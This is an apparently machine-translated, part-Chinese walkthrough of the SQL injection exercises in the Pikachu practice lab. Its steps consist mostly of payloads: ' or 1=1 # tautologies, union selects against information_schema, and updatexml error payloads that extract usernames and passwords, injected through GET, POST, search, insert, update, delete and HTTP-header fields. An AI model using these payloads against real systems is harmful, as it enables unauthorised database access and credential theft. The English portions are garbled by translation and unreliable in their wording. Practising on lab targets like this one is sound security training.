Pikahu-SQL injection module

Numeric sql injection (POST type):

First 1:

 

 Because it is post type, so the capture amended as permanent establishment:

id=1 or 1=1

 

 You can see, the page returned all the data.

 

 

Character sql injection (get type):

Direct input:

 

 Character implants require close sql statement, and then add permanent establishment, all the data:

kobe' or 1=1 #

 

 

 

 

Search Injection:

Search letter k try:

 

 View source code:

It can be seen here with a search sql statement: select username, id, email from member where username like '% $ name%'   

 

 Similarly, the closure may be selected sql statement: k% 'or 1 = 1 #:

 

 Get all the data:

 

 

 

XX-type implant:

Data parcel is different: a ') or 1 = 1 #

 

 

 

:( joint is injected with the last type, for example)

Analyzing the number of fields: a ') order by 3 #

 

a')  order by 2#

 

 

 May know the number of fields is 2

Then use a joint database query to get: pikachu

a')  union select database(),2#

 

Query the database tables

x') union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#

 

 

Query field name in the users table:

x') union select table_name,column_name from information_schema.columns where table_name='users'#

 

 

 Joint investigation to get a user name and password: a ') union select username, password from users #

 

 

 

 

Error injection:

 Conditions: The background is not being given the information shield

Common functions: updatexml () exactvalue () floor () (floor function)

 

 其他步骤省略（可以根据上面修改payload）。直接得到用户名和密码：

k') and updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)#

 

 

 

 

 

 

 

insert注入：

插入类型sql语句： insert into member (username ,pw,sex,phonenum,email,address) valuse('hzk','123456',1,123,123,123);

 

在插入的必填项中：hzk' or  updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)  or '

 

 

其他步骤相同，复制payload即可。

 

 

update注入：

先登录进去，然后在修改信息的框中直接填入语句即可，payload和insert的相同：

hzk' or  updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)  or '

 

得到用户名和密码

 

 

 

 

 

 

 

delete类型注入：

 

删除时抓包看一下：

 

 后台根据id然后删除，发送到repeater，然后改包：

id= 1 or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1)

 

 因为是在url中，所以需要进行url的编码：

 

 

 

 

得到用户名密码。

 

 

 

Http Header注入：

登陆之后发现有对头部信息的获取，所以可能存在注入

 

 抓包：

 

 修改user-agent或者cookie完成注入：

firefox'or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1)  ),1) or '

  得到用户名密码。